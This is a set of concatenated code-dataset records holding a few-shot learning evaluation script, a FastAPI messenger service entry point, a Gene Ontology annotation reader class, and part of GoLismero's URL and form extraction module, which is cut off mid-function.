transformation')\n\n opt = parser.parse_args()\n\n return opt\n\n\n\ndef compute_dataset_statistics(model, dataset_name, dataset, num_workers, statistics_root):\n dataloader = DataLoader(dataset, 128, shuffle=False, num_workers=num_workers, pin_memory=True)\n with torch.no_grad():\n class_features = collections.defaultdict(list)\n mean_ = []\n std_ = []\n num = []\n abs_mean = []\n print(\"calculating dataset statistics...\")\n for i, (data, labels) in enumerate(tqdm.tqdm(dataloader)):\n batch_size = data.size(0)\n data = data.cuda()\n \n labels = labels.cuda()\n data = model(data)\n data = F.adaptive_avg_pool2d(data, 1).squeeze_(-1).squeeze_(-1)\n data = F.normalize(data, p=2, dim=1, eps=1e-12)\n for j in range(batch_size):\n class_features[int(labels[j])].append(data[j])\n\n for class_, features in class_features.items():\n features = torch.stack(features)\n features = F.normalize(features, p=2, dim=1, eps=1e-12)\n features_abs = torch.abs(features)\n num.append(features.size(0))\n mean_.append(torch.mean(features, dim=0))\n abs_mean.append(torch.mean(features_abs, dim=0))\n std_.append(torch.std(features, dim=0))\n \n mean_ = torch.stack(mean_).cpu().numpy()\n np.save(os.path.join(statistics_root, \"meanof\"+dataset_name+\".npy\"),mean_)\n abs_mean = torch.stack(abs_mean).cpu().numpy()\n np.save(os.path.join(statistics_root, \"abs_meanof\"+dataset_name+\".npy\"),abs_mean)\n std_ = torch.stack(std_).cpu().numpy()\n np.save(os.path.join(statistics_root, \"stdof\"+dataset_name+\".npy\"),std_)\n num = np.array(num)\n np.save(os.path.join(statistics_root, \"numof\"+dataset_name+\".npy\"),num)\n\n\n\ndef main():\n args = parse_option()\n args.use_oracle = False if args.use_oracle == \"False\" else True\n\n\n if args.backbone_name == 'resnet50':\n resize_sz = 256\n crop_sz = 224\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n else:\n resize_sz = 92\n crop_sz = 84\n normalize = transforms.Normalize(mean=[0.4712, 0.4499, 0.4031],\n std=[0.2726, 0.2634, 0.2794])\n\n transform = transforms.Compose([\n transforms.Resize([resize_sz, resize_sz]),\n transforms.CenterCrop(crop_sz),\n transforms.ToTensor(),\n normalize])\n\n #obtain dataset\n if args.dataset_name == 'miniImageNet':\n dataset = miniImageNet(args.dataset_root, transform)\n elif args.dataset_name == 'Aircraft':\n dataset = AircraftDataset(args.dataset_root, transform)\n elif args.dataset_name == 'Omniglot':\n dataset = omniglot(args.dataset_root, transform)\n elif args.dataset_name == 'VGG_Flower':\n dataset = OxfordFlowers102Dataset(args.dataset_root, transform)\n elif args.dataset_name == 'MSCOCO':\n dataset = coco(args.dataset_root, transform)\n elif args.dataset_name == 'ISIC':\n dataset = ISIC(args.dataset_root, transform)\n elif args.dataset_name == 'ChestX':\n dataset = Chest(args.dataset_root, transform)\n else:\n dataset = general_dataset(args.dataset_root, transform)\n\n # Logistic Regression passes single task\n if args.classifier_name == 'LR' or args.use_oracle == True:\n args.batch_size = 1\n\n\n model = get_backbone(args.backbone_name)\n state = torch.load(args.backbone_path)\n model.load_state_dict(state)\n if torch.cuda.is_available():\n model = model.cuda()\n\n model.eval()\n\n \n \n if args.use_oracle == True:\n args.way = 2# Oracle transformation is used under binary tasks\n if not os.path.exists(args.statistics_root):\n os.makedirs(args.statistics_root)\n if not os.path.exists(os.path.join(args.statistics_root,\"meanof\"+args.dataset_name+\".npy\")):\n compute_dataset_statistics(model, args.dataset_name, dataset, args.num_workers, args.statistics_root)\n \n if args.use_oracle:\n classifier = get_classifier(\n args.classifier_name, \n use_Oracle=True, \n statistics_root=args.statistics_root, \n dataset_name=args.dataset_name)\n else:\n classifier = get_classifier(args.classifier_name, use_Oracle=False)\n \n\n task_sampler = CategoriesSampler(dataset.label, args.num_task,\n args.way, args.shot+args.num_query, args.batch_size)\n\n data_loader = DataLoader(\n dataset,\n batch_size = 1,\n shuffle = False,\n num_workers = args.num_workers,\n batch_sampler = task_sampler,\n pin_memory = True\n )\n \n \n \n \n\n \n query_label = torch.arange(args.way, dtype=torch.int8).repeat(args.num_query)\n query_label = query_label.type(torch.LongTensor).reshape(-1)\n query_label = torch.unsqueeze(query_label, 0).repeat(args.batch_size, 1).reshape(-1)\n if torch.cuda.is_available():\n query_label = query_label.cuda()\n\n #None: original performance. Simple: performance using simple transformation\n\n\n acc_Nones = []\n acc_Simples = []\n if args.use_oracle == True:\n acc_Oracles = []\n data_loader_tqdm = tqdm.tqdm(data_loader)\n with torch.no_grad():\n for _, batch in enumerate(data_loader_tqdm, 1):\n data, labels = [_ for _ in batch]\n if args.use_oracle == True:\n all_labels = []\n for label in labels:\n j = int(label)\n if j not in all_labels:\n all_labels.append(j)\n if torch.cuda.is_available():\n data = data.cuda()\n num_support_samples = args.way * args.shot\n data = model(data)\n data = data.reshape([args.batch_size, -1] + list(data.shape[-3:]))\n data_support = data[:, :num_support_samples]\n data_query = data[:, num_support_samples:]\n\n logit_None = classifier(data_query, data_support, args.way, args.shot, False, False)\n logit_Simple = classifier(data_query, data_support, args.way, args.shot, True, False)\n\n if args.use_oracle == True:\n logit_Oracle = classifier(data_query, data_support, args.way, args.shot, False, True, all_labels)\n # print(logit_Oracle.shape)\n logit_Oracle = logit_Oracle.reshape(query_label.size(0),-1)\n acc_Oracle = count_acc(logit_Oracle, query_label) * 100\n acc_Oracles.append(acc_Oracle)\n\n logit_None = logit_None.reshape(query_label.size(0),-1)\n logit_Simple = logit_Simple.reshape(query_label.size(0),-1)\n\n acc_None = count_acc(logit_None, query_label) * 100\n acc_Simple = count_acc(logit_Simple, query_label) * 100\n acc_Nones.append(acc_None)\n acc_Simples.append(acc_Simple)\n\n \n mean_acc_Nones = np.mean(acc_Nones)\n confidence_interval_None = 1.96 * np.std(acc_Nones)/math.sqrt(len(acc_Nones))\n mean_acc_Simples = np.mean(acc_Simples)\n confidence_interval_Simple = 1.96 * np.std(acc_Simples)/math.sqrt(len(acc_Simples))\n if args.use_oracle == True:\n mean_acc_Oracles = np.mean(acc_Oracles)\n confidence_interval_Oracle = 1.96 * np.std(acc_Oracles)/math.sqrt(len(acc_Oracles))\n\n print(\"Average original accuracy with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Nones, confidence_interval_None))\n print(\"Average accuracy using simple transformation with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Simples, confidence_interval_Simple))\n if args.use_oracle == True:\n print(\"Average accuracy using oracle transformation with 95% confidence interval: {:.2f}% +- {:.2f}\".format(mean_acc_Oracles, confidence_interval_Oracle))\n \nif __name__ == '__main__':\n main()\n \n \n\n \n \n\n","repo_name":"Frankluox/Channel_Importance_FSL","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":10824,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"75"} +{"seq_id":"73297226162","text":"from socketio import AsyncRedisManager\nimport uvicorn\nfrom fastapi import Depends\nfrom fastapi import FastAPI\nfrom opencensus.trace.samplers import AlwaysOnSampler\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.middleware.trustedhost import TrustedHostMiddleware\nfrom starlette_exporter import PrometheusMiddleware\nfrom starlette_exporter import handle_metrics\nfrom smsaero.client import SMSAero\n\nfrom app.exceptions.binding import setup_exception_handlers\nfrom app.i18n.tr import get_locale\nfrom app.services.ipwhois.client import IPWhoisClient\nfrom app.services.ipwhois.dependencies import IPWhoisClientMarker\nfrom app.services.smsaero.dependencies import SMSAeroDependencyMarker\nfrom app.services.redis.queue.client import RedisSocketQueue\nfrom app.services.redis.queue.dependencies import (\n RedisSocketQueueDependencyMarker,\n)\nfrom app.utils.logging.middlewares import LoggingMiddleware\nfrom app.utils.logging.middlewares import OpenCensusFastAPIMiddleware\nfrom app.v1.binding import own_router_v1\nfrom app.v1.conversations.chats.dependencies import ChatDependencyMarker\nfrom app.v1.conversations.chats.repo import ChatRepository\nfrom app.v1.conversations.messages.dependencies import MessageDependencyMarker\nfrom app.v1.conversations.messages.dependencies import (\n MessageServiceDependencyMarker,\n)\nfrom app.v1.conversations.messages.repo import MessageRepository\nfrom app.v1.conversations.messages.services import MessageService\nfrom app.v1.security.dependencies import UserSessionDependencyMarker\nfrom app.v1.security.repo import UserSessionRepository\nfrom app.v1.security.services import UserSessionService\nfrom app.v1.users.dependencies import UsersDependencyMarker\nfrom app.v1.users.services import UserService\nfrom config import BaseSettingsMarker\nfrom config import HTTPAuthSettings\nfrom config import HTTPAuthSettingsMarker\nfrom config import OtherServicesSettings\nfrom config import OtherServicesSettingsMarker\nfrom config import Settings\nfrom config import settings_app\nfrom config import settings_redis\nfrom config import settings_sensus_app\nfrom config import settings_services\nfrom misc import async_session\n\n\n# dictConfig(settings_sensus_app.log_config)\n# logger = logging.getLogger(__name__)\n\n\ndef get_application_v1() -> FastAPI:\n application = FastAPI(\n debug=False,\n docs_url=None,\n openapi_url=\"/api/v1/openapi.json\",\n title=\"CapiMessanger Microservice\",\n version=\"1.2.15\",\n root_path=\"/api/v1\",\n dependencies=[Depends(get_locale)],\n )\n application.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\n application.add_middleware(TrustedHostMiddleware, allowed_hosts=[\"*\"])\n application.add_middleware(\n PrometheusMiddleware,\n app_name=\"v1\",\n skip_paths=[\"/api/v1/docs\", \"/api/v1/__metrics\"],\n )\n\n if settings_app.LOGGING:\n application.middleware(\"http\")(LoggingMiddleware())\n if settings_sensus_app.ENABLE_TELEMETRY:\n application.middleware(\"http\")(\n OpenCensusFastAPIMiddleware(\n application, sampler=AlwaysOnSampler()\n )\n )\n\n application.dependency_overrides.update(\n {\n UsersDependencyMarker: lambda: UserService(\n db_session=async_session\n ),\n UserSessionDependencyMarker: lambda: UserSessionService(\n repo=UserSessionRepository(db_session=async_session),\n sms_aero=SMSAero(\n email=settings_services.SMSAERO_EMAIL,\n api_key=settings_services.SMSAERO_API_KEY,\n ),\n whois=IPWhoisClient(api_key=settings_services.IPWHOIS_API),\n ),\n HTTPAuthSettingsMarker: lambda: HTTPAuthSettings(),\n BaseSettingsMarker: lambda: Settings(),\n OtherServicesSettingsMarker: lambda: OtherServicesSettings(),\n SMSAeroDependencyMarker: lambda: SMSAero(\n email=settings_services.SMSAERO_EMAIL,\n api_key=settings_services.SMSAERO_API_KEY,\n ),\n IPWhoisClientMarker: lambda: IPWhoisClient(\n api_key=settings_services.IPWHOIS_API\n ),\n ChatDependencyMarker: lambda: ChatRepository(\n db_session=async_session\n ),\n MessageDependencyMarker: lambda: MessageRepository(\n db_session=async_session\n ),\n RedisSocketQueueDependencyMarker: lambda: RedisSocketQueue(\n mgr=AsyncRedisManager(\n url=settings_redis.dsn(\n host=settings_redis.REDIS_HOST,\n port=settings_redis.REDIS_PORT,\n database=settings_redis.REDIS_DB_QUEUE,\n user=settings_redis.REDIS_USER,\n password=settings_redis.REDIS_PWD,\n ),\n channel=settings_redis.REDIS_DB_QUEUE_CHANNEL,\n )\n ),\n }\n )\n application.dependency_overrides.update(\n {\n MessageServiceDependencyMarker: lambda: MessageService(\n repo=application.dependency_overrides.get(\n MessageDependencyMarker\n )(),\n redis=application.dependency_overrides.get(\n RedisSocketQueueDependencyMarker\n )(),\n ),\n }\n )\n application.include_router(own_router_v1)\n application = setup_exception_handlers(app=application)\n return application\n\n\ndef get_parent_app() -> FastAPI:\n tags_metadata = [\n {\n \"name\": \"v1\",\n \"description\": \"Версия API - v1. Нажмите справа для перехода в документацию\",\n \"externalDocs\": {\n \"description\": \"дополнительная документация\",\n \"url\": f\"https://{settings_app.BASE_DOMAIN}/api/v1/docs\",\n },\n },\n ]\n\n application = FastAPI(\n openapi_tags=tags_metadata,\n )\n\n application.mount(\"/api/v1\", get_application_v1())\n application.add_route(\"/__metrics\", handle_metrics)\n\n return application\n\n\napp = get_parent_app()\n\nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", port=10100, reload=True)\n","repo_name":"capiorg/backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"19599220890","text":"\"\"\"Read an Association File and store the data in a Python object.\"\"\"\n\nimport sys\nimport timeit\nimport datetime\nimport collections as cx\nfrom goatools.evidence_codes import EvidenceCodes\nfrom goatools.anno.opts import AnnoOptions\nfrom goatools.godag.consts import Consts\n\n__copyright__ = \"Copyright (C) 2016-2019, DV Klopfenstein, H Tang. All rights reserved.\"\n__author__ = \"DV Klopfenstein\"\n\n\nclass AnnoReaderBase(object):\n \"\"\"Reads a Gene Association File. Returns a Python object.\"\"\"\n # pylint: disable=broad-except,line-too-long,too-many-instance-attributes\n\n tic = timeit.default_timer()\n\n # Expected values for a Qualifier\n exp_qualifiers = set([\n # Seen in both GAF and gene2go\n 'not', 'contributes_to', 'colocalizes_with',\n ])\n\n valid_formats = {'gpad', 'gaf', 'gene2go', 'id2gos'}\n\n exp_nss = set(['BP', 'MF', 'CC'])\n\n # pylint: disable=too-many-instance-attributes\n def __init__(self, name, filename=None, **kws):\n # kws: allow_missing_symbol\n self.name = name # name is one of valid_formats\n self.filename = filename\n self.godag = kws.get('godag')\n self.namespaces = kws.get('namespaces')\n self.evobj = EvidenceCodes()\n # Read anotation file, store namedtuples:\n # Gene2GoReader(filename=None, taxids=None):\n # GafReader(filename=None, hdr_only=False, prt=sys.stdout, allow_missing_symbol=False):\n # GpadReader(filename=None, hdr_only=False):\n self.hdr = None\n self.datobj = None\n # pylint: disable=no-member\n self.associations = self._init_associations(filename, **kws)\n # assert self.associations, 'NO ANNOTATIONS FOUND: {ANNO}'.format(ANNO=filename)\n assert self.namespaces is None or isinstance(self.namespaces, set)\n\n def get_desc(self):\n \"\"\"Get description\"\"\"\n return '{NAME} {NSs} {GODAG}'.format(\n NAME=self.name,\n NSs='' if self.namespaces is None else ','.join(self.namespaces),\n GODAG='' if self.godag is None else 'godag')\n\n # pylint: disable=unused-argument\n def get_associations(self, taxid=None):\n \"\"\"Get associations\"\"\"\n # taxid is for NCBI's gene2gos\n return self.associations\n\n def prt_summary_anno2ev(self, prt=sys.stdout):\n \"\"\"Print annotation/evidence code summary.\"\"\"\n self.evobj.prt_summary_anno2ev(self.associations, prt)\n\n def get_name(self):\n \"\"\"Return type of annotation\"\"\"\n return self.name\n\n # pylint: disable=no-self-use\n def get_taxid(self):\n \"\"\"Return taxid, if one was provided, otherwise return -1\"\"\"\n return -1\n\n def get_ns2assc(self, **kws):\n \"\"\"Return given associations into 3 (BP, MF, CC) dicts, id2gos\"\"\"\n return {ns:self._get_id2gos(nts, **kws) for ns, nts in self.get_ns2ntsanno(kws.get('taxid')).items()}\n\n # pylint: disable=unused-argument\n def get_ns2ntsanno(self, taxid=None):\n \"\"\"Split list of annotations into 3 lists: BP, MF, CC\"\"\"\n return self._get_ns2ntsanno(self.associations)\n\n def _get_ns2ntsanno(self, annotations):\n \"\"\"Split list of annotations into 3 lists: BP, MF, CC\"\"\"\n if self.name in {'gpad', 'id2gos'}:\n assert self.godag is not None, \"{T}: LOAD godag TO USE {C}::ns2ntsanno\".format(\n C=self.__class__.__name__, T=self.name)\n ns2nts = cx.defaultdict(list)\n for nta in annotations:\n ns2nts[nta.NS].append(nta)\n return {ns:ns2nts[ns] for ns in self.exp_nss.intersection(ns2nts)}\n\n def get_id2gos_nss(self, **kws):\n \"\"\"Return all associations in a dict, id2gos, regardless of namespace\"\"\"\n return self._get_id2gos(self.associations, **kws)\n\n #### def get_id2gos(self, namespace='BP', **kws):\n #### \"\"\"Return associations from specified namespace in a dict, id2gos\"\"\"\n #### # pylint: disable=superfluous-parens\n #### if self.has_ns():\n #### assoc = [nt for nt in self.associations if nt.NS == namespace]\n #### id2gos = self._get_id2gos(assoc, **kws)\n #### print('{N} IDs in loaded association branch, {NS}'.format(N=len(id2gos), NS=namespace))\n #### return id2gos\n #### print('**ERROR get_id2gos: GODAG NOT LOADED. IGNORING namespace({NS})'.format(NS=namespace))\n #### id2gos = self._get_id2gos(self.associations, **kws)\n #### print('{N} IDs in association branch, {NS}'.format(N=len(id2gos), NS=namespace))\n #### return id2gos\n\n def get_id2gos(self, namespace=None, **kws):\n \"\"\"Return associations from specified namespace in a dict, id2gos\"\"\"\n # pylint: disable=superfluous-parens\n if self.has_ns(): # Anno namedtuple has NS field\n nspc, assoc = self._get_1ns_assn(namespace)\n id2gos = self._get_id2gos(assoc, **kws)\n print('{N} IDs in loaded association branch, {NS}'.format(N=len(id2gos), NS=nspc))\n return id2gos\n if namespace is not None:\n print('**ERROR get_id2gos: GODAG NOT LOADED. IGNORING namespace({NS})'.format(NS=namespace))\n id2gos = self._get_id2gos(self.associations, **kws)\n print('{N} IDs in all associations'.format(N=len(id2gos)))\n return id2gos\n\n def _get_1ns_assn(self, namespace_usr):\n \"\"\"Get one namespace, given a user-provided namespace or a default\"\"\"\n # If all namespaces were loaded\n if self.namespaces is None:\n # Return user-specified namespace, if provided. Otherwise BP\n nspc = 'BP' if namespace_usr is None else namespace_usr\n # Return one namespace\n if nspc in set(Consts.NAMESPACE2NS.values()):\n return nspc, [nt for nt in self.associations if nt.NS == nspc]\n # Return all namespaces\n return nspc, self.associations\n # If one namespace was loaded, use that regardless of what user specfies\n if len(self.namespaces) == 1:\n nspc = next(iter(self.namespaces))\n if namespace_usr is not None and nspc != namespace_usr:\n print('**WARNING: IGNORING {ns}; ONLY {NS} WAS LOADED'.format(\n ns=namespace_usr, NS=nspc))\n return nspc, self.associations\n if namespace_usr is None:\n print('**ERROR get_id2gos: GODAG NOT LOADED. USING: {NSs}'.format(\n NSs=' '.join(sorted(self.namespaces))))\n return namespace_usr, self.associations\n\n def has_ns(self):\n \"\"\"Return True if namespace field, NS exists on annotation namedtuples\"\"\"\n return hasattr(next(iter(self.associations)), 'NS')\n\n def _get_id2gos(self, associations, **kws):\n \"\"\"Return given associations in a dict, id2gos\"\"\"\n options = AnnoOptions(self.evobj, **kws)\n # Default reduction is to remove. For all options, see goatools/anno/opts.py:\n # * Evidence_Code == ND -> No biological data No biological Data available\n # * Qualifiers contain NOT\n assc = self.reduce_annotations(associations, options)\n a2bs = self.get_dbid2goids(assc) if options.b_geneid2gos else self.get_goid2dbids(assc)\n # if not a2bs:\n # raise RuntimeError('**ERROR: NO ASSOCATIONS FOUND: {FILE}'.format(FILE=self.filename))\n return a2bs\n\n def _get_namespaces(self, nts):\n \"\"\"Get the set of namespaces seen in the namedtuples.\"\"\"\n return set(nt.NS for nt in nts) if self.has_ns() else set()\n\n # Qualifier (column 4)\n # Flags that modify the interpretation of an annotation one (or more) of NOT, contributes_to, colocalizes_with\n # This field is not mandatory;\n # * cardinality 0, 1, >1;\n # * for cardinality >1 use a pipe to separate entries (e.g. NOT|contributes_to)\n def prt_qualifiers(self, prt=sys.stdout):\n \"\"\"Print Qualifiers: 1,462 colocalizes_with; 1,454 contributes_to; 1,157 not\"\"\"\n # 13 not colocalizes_with (TBD: CHK - Seen in gene2go, but not gafs)\n # 4 not contributes_to (TBD: CHK - Seen in gene2go, but not gafs)\n self._prt_qualifiers(self.associations, prt)\n\n @staticmethod\n def _prt_qualifiers(associations, prt=sys.stdout):\n \"\"\"Print Qualifiers found in the annotations.\n QUALIFIERS:\n 1,462 colocalizes_with\n 1,454 contributes_to\n 1,157 not\n 13 not colocalizes_with (TBD: CHK - Seen in gene2go, but not gafs)\n 4 not contributes_to (TBD: CHK - Seen in gene2go, but not gafs)\n \"\"\"\n prt.write('QUALIFIERS:\\n')\n for fld, cnt in cx.Counter(q for nt in associations for q in nt.Qualifier).most_common():\n prt.write(' {N:6,} {FLD}\\n'.format(N=cnt, FLD=fld))\n\n def reduce_annotations(self, annotations, options):\n \"\"\"Reduce annotations to ones used to identify enrichment (normally exclude ND and NOT).\"\"\"\n getfnc_qual_ev = options.getfnc_qual_ev()\n return [nt for nt in annotations if getfnc_qual_ev(nt.Qualifier, nt.Evidence_Code)]\n\n @staticmethod\n def get_dbid2goids(associations):\n \"\"\"Return gene2go data for user-specified taxids.\"\"\"\n id2gos = cx.defaultdict(set)\n for ntd in associations:\n id2gos[ntd.DB_ID].add(ntd.GO_ID)\n return dict(id2gos)\n\n @staticmethod\n def get_goid2dbids(associations):\n \"\"\"Return gene2go data for user-specified taxids.\"\"\"\n go2ids = cx.defaultdict(set)\n for ntd in associations:\n go2ids[ntd.GO_ID].add(ntd.DB_ID)\n return dict(go2ids)\n\n def hms(self, msg, tic=None, prt=sys.stdout):\n \"\"\"Print elapsed time and message.\"\"\"\n if tic is None:\n tic = self.tic\n now = timeit.default_timer()\n hms = str(datetime.timedelta(seconds=(now-tic)))\n prt.write('{HMS}: {MSG}\\n'.format(HMS=hms, MSG=msg))\n return now\n\n def chk_associations(self, fout_err=None):\n \"\"\"Check that associations are in expected format.\"\"\"\n pass\n\n def nts_ev_nd(self):\n \"\"\"Get annotations where Evidence_code == 'ND' (No biological data)\"\"\"\n return [nt for nt in self.associations if nt.Evidence_Code == 'ND']\n\n def nts_qual_not(self):\n \"\"\"Get annotations having Qualifiers containing NOT\"\"\"\n return [nt for nt in self.associations if self._has_not_qual(nt)]\n\n def chk_qualifiers(self):\n \"\"\"Check format of qualifier\"\"\"\n if self.name == 'id2gos':\n return\n for ntd in self.associations:\n # print(ntd)\n qual = ntd.Qualifier\n assert isinstance(qual, set), '{NAME}: QUALIFIER MUST BE A LIST: {NT}'.format(\n NAME=self.name, NT=ntd)\n assert qual != set(['']), ntd\n assert qual != set(['-']), ntd\n assert 'always' not in qual, 'SPEC SAID IT WOULD BE THERE'\n\n @staticmethod\n def _has_not_qual(ntd):\n \"\"\"Return True if the qualifiers contain a 'NOT'\"\"\"\n for qual in ntd.Qualifier:\n if 'not' in qual:\n return True\n if 'NOT' in qual:\n return True\n return False\n\n\n\n# Copyright (C) 2016-2019, DV Klopfenstein, H Tang. All rights reserved.\"\n","repo_name":"AlexPersa7/goatools","sub_path":"goatools/anno/annoreader_base.py","file_name":"annoreader_base.py","file_ext":"py","file_size_in_byte":11245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"39281851292","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nURL scraping API.\n\nThis module contains utility functions to extract (scrape) URLs from data.\nCurrently only HTML and plain text data are supported.\n\"\"\"\n\n__license__ = \"\"\"\nGoLismero 2.0 - The web knife - Copyright (C) 2011-2014\n\nGolismero project site: https://github.com/golismero\nGolismero project mail: contact@golismero-project.com\n\nThis program is free software; you can redistribute it and/or\nmodify it under the terms of the GNU General Public License\nas published by the Free Software Foundation; either version 2\nof the License, or (at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program; if not, write to the Free Software\nFoundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n\"\"\"\n\n__all__ = [\n\n # Generic entry point.\n \"extract\",\n\n # Specific parsers for each data format.\n \"extract_from_text\",\n \"extract_from_html\",\n\n # Helper functions.\n \"is_link\",\n]\n\nfrom .web_utils import parse_url, urldefrag, urljoin\n\nfrom BeautifulSoup import BeautifulSoup\nfrom warnings import warn\n\nimport re\nfrom codecs import decode\nfrom chardet import detect\n\n\n#------------------------------------------------------------------------------\n# URL detection regex, by John Gruber.\n# http://daringfireball.net/2010/07/improved_regex_for_matching_urls\n_re_url_readable = re.compile(r\"\"\"(?i)\\b((?:[a-z][\\w-]+:(?:/{1,3}|[a-z0-9%])|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\".,<>?«»“”‘’]))\"\"\", re.I)\n\n\n#------------------------------------------------------------------------------\n# Wrappers for URIs in plain text\n# http://www.w3.org/Addressing/URL/url-spec.txt\n_re_url_rfc = re.compile(r\"\"\"\\\\<([^\\\\>]+\\\\:\\\\/\\\\/[^\\\\>]+)\\\\>\"\"\", re.I)\n\n\n#------------------------------------------------------------------------------\ndef is_link(url, base_url):\n \"\"\"\n Determines if an URL is a link to another resource.\n\n :param url: URL to test.\n :type url: str\n\n :param base_url: Base URL for the current document.\n Must not contain a fragment.\n :type base_url: str\n\n :returns: True if the URL points to another page or resource,\n False otherwise.\n :rtype: bool\n \"\"\"\n try:\n\n # Parse the URL. If it can't be parsed, it's not a link.\n parsed = parse_url(url, base_url)\n\n # URLs that point to the same page\n # in a different fragment are not links.\n parsed.fragment = \"\"\n if parsed.url == base_url:\n return False\n\n # All other URLs are links.\n return True\n\n # On any parsing error assume it's not a link.\n except Exception:\n return False\n\n\n#------------------------------------------------------------------------------\ndef extract_from_text(text, base_url = None, only_links = True):\n \"\"\"\n Extract URLs from text.\n\n Implementation notes:\n\n - Unicode URLs are currently not supported.\n\n :param text: Text.\n :type text: str\n\n :param base_url: Base URL for the current document.\n If not specified, relative URLs are ignored.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Trivial case.\n if not text:\n return set()\n\n # Check the type.\n if not isinstance(text, basestring):\n raise TypeError(\"Expected string, got %r instead\" % type(text))\n\n # Set where the URLs will be collected.\n result = set()\n\n # Remove the fragment from the base URL.\n if base_url:\n base_url = urldefrag(base_url)[0]\n\n # Look for URLs using regular expressions.\n for regex in (_re_url_rfc, _re_url_readable):\n for url in regex.findall(text):\n url = url[0]\n\n # Skip if we've already seen it.\n if url in result:\n continue\n\n # XXX FIXME\n # Make sure the text is really ASCII text.\n # We don't support Unicode yet.\n try:\n url = str(url)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % url)\n continue\n\n # If a base URL was given...\n if base_url:\n\n # Canonicalize the URL.\n # Discard it on parse error.\n try:\n url = urljoin(base_url, url.strip())\n except Exception:\n continue\n\n # Skip if we've already seen it.\n if url in result:\n continue\n\n # Discard URLs that are not links to other pages or resources,\n # and URLs we've already seen.\n if only_links and (url in result or\n not is_link(url, base_url = base_url)):\n continue\n\n # If a base URL was NOT given...\n else:\n\n # Discard relative URLs.\n # Also discard them on parse error.\n try:\n parsed = parse_url(url)\n if not parsed.scheme or not parsed.netloc:\n continue\n except Exception:\n raise\n continue\n\n # Add the URL to the set.\n result.add(url)\n\n # Return the set of collected URLs.\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract_forms_from_html(raw_html, base_url):\n \"\"\"\n Extract forms info from HTML.\n\n :param raw_html: Raw HTML data.\n :type raw_html: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :returns: Extracted form info.\n :rtype: list((URL, METHOD, list({ \"name\" : PARAM_NAME, \"value\" : PARAM_VALUE, \"type\" : PARAM_TYPE})))\n \"\"\"\n\n # Set where the URLs will be collected.\n result = list()\n result_append = result.append\n\n # Remove the fragment from the base URL.\n base_url = urldefrag(base_url)[0]\n\n # Parse the raw HTML.\n bs = BeautifulSoup(decode(raw_html, detect(raw_html)[\"encoding\"]))\n\n for form in bs.findAll(\"form\"):\n target = form.get(\"action\", None)\n method = form.get(\"method\", \"POST\").upper()\n\n if not target:\n continue\n\n try:\n target = str(target)\n except Exception:\n warn(\"Unicode URLs not yet supported: %r\" % target)\n continue\n\n # Canonicalize the URL.\n try:\n target = urljoin(base_url, target.strip())\n except Exception:\n continue\n\n form_params = []\n form_params_append = form_params.append\n for params in form.findAll(\"input\"):\n if params.get(\"type\") == \"submit\":\n continue\n\n form_params_append({\n \"name\": params.get(\"name\", \"NAME\"),\n \"value\": params.get(\"value\", \"VALUE\"),\n \"type\": params.get(\"type\", \"TYPE\")})\n\n # Add to results\n result_append((target, method, form_params))\n\n return result\n\n\n#------------------------------------------------------------------------------\ndef extract_from_html(raw_html, base_url, only_links = True):\n \"\"\"\n Extract URLs from HTML.\n\n Implementation notes:\n\n - The current implementation is fault tolerant, meaning it will try\n to extract URLs even if the HTML is malformed and browsers wouldn't\n normally see those links. This may therefore result in some false\n positives.\n\n - HTML5 tags are supported, including tags not currently supported by\n any major browser.\n\n :param raw_html: Raw HTML data.\n :type raw_html: str\n\n :param base_url: Base URL for the current document.\n :type base_url: str\n\n :param only_links: If True, only extract links to other resources.\n If False, extract all URLs.\n :type only_links: bool\n\n :returns: Extracted URLs.\n :rtype: set(str)\n \"\"\"\n\n # Set where the URLs will be collected.\n result = set()\n add_result = result.add\n\n # Remove the fragment from the base URL.\n base_url = urldefrag(base_url)[0]\n\n # Parse the raw HTML.\n bs = BeautifulSoup(decode(raw_html, detect(raw_html)[\"encoding\"]),\n convertEntities = BeautifulSoup.ALL_ENTITIES)\n\n # Some sets of tags and attributes to look for.\n href_tags = {\"a\", \"link\", \"area\"}\n src_tags = {\"script\", \"img\", \"iframe\", \"frame\", \"embed\", \"source\", \"track\"}\n param_names = {\"movie\", \"href\", \"link\", \"src\", \"url\", \"uri\"}\n\n # Iterate once through all tags...\n for tag in bs.findAll():\n\n # Get the tag name, case insensitive.\n name = tag.name.lower()\n\n # Extract the URL from each tag that has one.\n url = None\n if name in href_tags:\n url = tag.get(\"href\", None)\n elif name in src_tags:\n url = tag.get(\"src\", None)\n elif name == \"param\":\n name = tag.get(\"name\", \"\").lower().strip()\n if name in param_names:\n url = tag.get(\"value\", None)\n ##elif name == \"form\":\n 